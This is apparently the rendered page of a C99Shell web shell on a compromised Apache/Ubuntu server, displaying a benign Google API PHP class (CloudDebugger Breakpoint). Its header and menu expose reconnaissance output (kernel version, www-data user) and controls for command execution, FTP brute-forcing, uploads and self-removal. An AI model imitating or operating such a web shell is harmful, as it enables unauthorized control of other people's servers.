!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/vendor/google/apiclient-services/src/Google/Service/CloudDebugger/   drwxr-xr-x
Free 13.02 GB of 57.97 GB (22.46%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Breakpoint.php (5.11 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

class Google_Service_CloudDebugger_Breakpoint extends Google_Collection
{
  protected 
$collection_key 'variableTable';
  public 
$action;
  public 
$canaryExpireTime;
  public 
$condition;
  public 
$createTime;
  protected 
$evaluatedExpressionsType 'Google_Service_CloudDebugger_Variable';
  protected 
$evaluatedExpressionsDataType 'array';
  public 
$expressions;
  public 
$finalTime;
  public 
$id;
  public 
$isFinalState;
  public 
$labels;
  protected 
$locationType 'Google_Service_CloudDebugger_SourceLocation';
  protected 
$locationDataType '';
  public 
$logLevel;
  public 
$logMessageFormat;
  protected 
$stackFramesType 'Google_Service_CloudDebugger_StackFrame';
  protected 
$stackFramesDataType 'array';
  public 
$state;
  protected 
$statusType 'Google_Service_CloudDebugger_StatusMessage';
  protected 
$statusDataType '';
  public 
$userEmail;
  protected 
$variableTableType 'Google_Service_CloudDebugger_Variable';
  protected 
$variableTableDataType 'array';

  public function 
setAction($action)
  {
    
$this->action $action;
  }
  public function 
getAction()
  {
    return 
$this->action;
  }
  public function 
setCanaryExpireTime($canaryExpireTime)
  {
    
$this->canaryExpireTime $canaryExpireTime;
  }
  public function 
getCanaryExpireTime()
  {
    return 
$this->canaryExpireTime;
  }
  public function 
setCondition($condition)
  {
    
$this->condition $condition;
  }
  public function 
getCondition()
  {
    return 
$this->condition;
  }
  public function 
setCreateTime($createTime)
  {
    
$this->createTime $createTime;
  }
  public function 
getCreateTime()
  {
    return 
$this->createTime;
  }
  
/**
   * @param Google_Service_CloudDebugger_Variable[]
   */
  
public function setEvaluatedExpressions($evaluatedExpressions)
  {
    
$this->evaluatedExpressions $evaluatedExpressions;
  }
  
/**
   * @return Google_Service_CloudDebugger_Variable[]
   */
  
public function getEvaluatedExpressions()
  {
    return 
$this->evaluatedExpressions;
  }
  public function 
setExpressions($expressions)
  {
    
$this->expressions $expressions;
  }
  public function 
getExpressions()
  {
    return 
$this->expressions;
  }
  public function 
setFinalTime($finalTime)
  {
    
$this->finalTime $finalTime;
  }
  public function 
getFinalTime()
  {
    return 
$this->finalTime;
  }
  public function 
setId($id)
  {
    
$this->id $id;
  }
  public function 
getId()
  {
    return 
$this->id;
  }
  public function 
setIsFinalState($isFinalState)
  {
    
$this->isFinalState $isFinalState;
  }
  public function 
getIsFinalState()
  {
    return 
$this->isFinalState;
  }
  public function 
setLabels($labels)
  {
    
$this->labels $labels;
  }
  public function 
getLabels()
  {
    return 
$this->labels;
  }
  
/**
   * @param Google_Service_CloudDebugger_SourceLocation
   */
  
public function setLocation(Google_Service_CloudDebugger_SourceLocation $location)
  {
    
$this->location $location;
  }
  
/**
   * @return Google_Service_CloudDebugger_SourceLocation
   */
  
public function getLocation()
  {
    return 
$this->location;
  }
  public function 
setLogLevel($logLevel)
  {
    
$this->logLevel $logLevel;
  }
  public function 
getLogLevel()
  {
    return 
$this->logLevel;
  }
  public function 
setLogMessageFormat($logMessageFormat)
  {
    
$this->logMessageFormat $logMessageFormat;
  }
  public function 
getLogMessageFormat()
  {
    return 
$this->logMessageFormat;
  }
  
/**
   * @param Google_Service_CloudDebugger_StackFrame[]
   */
  
public function setStackFrames($stackFrames)
  {
    
$this->stackFrames $stackFrames;
  }
  
/**
   * @return Google_Service_CloudDebugger_StackFrame[]
   */
  
public function getStackFrames()
  {
    return 
$this->stackFrames;
  }
  public function 
setState($state)
  {
    
$this->state $state;
  }
  public function 
getState()
  {
    return 
$this->state;
  }
  
/**
   * @param Google_Service_CloudDebugger_StatusMessage
   */
  
public function setStatus(Google_Service_CloudDebugger_StatusMessage $status)
  {
    
$this->status $status;
  }
  
/**
   * @return Google_Service_CloudDebugger_StatusMessage
   */
  
public function getStatus()
  {
    return 
$this->status;
  }
  public function 
setUserEmail($userEmail)
  {
    
$this->userEmail $userEmail;
  }
  public function 
getUserEmail()
  {
    return 
$this->userEmail;
  }
  
/**
   * @param Google_Service_CloudDebugger_Variable[]
   */
  
public function setVariableTable($variableTable)
  {
    
$this->variableTable $variableTable;
  }
  
/**
   * @return Google_Service_CloudDebugger_Variable[]
   */
  
public function getVariableTable()
  {
    return 
$this->variableTable;
  }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0058 ]--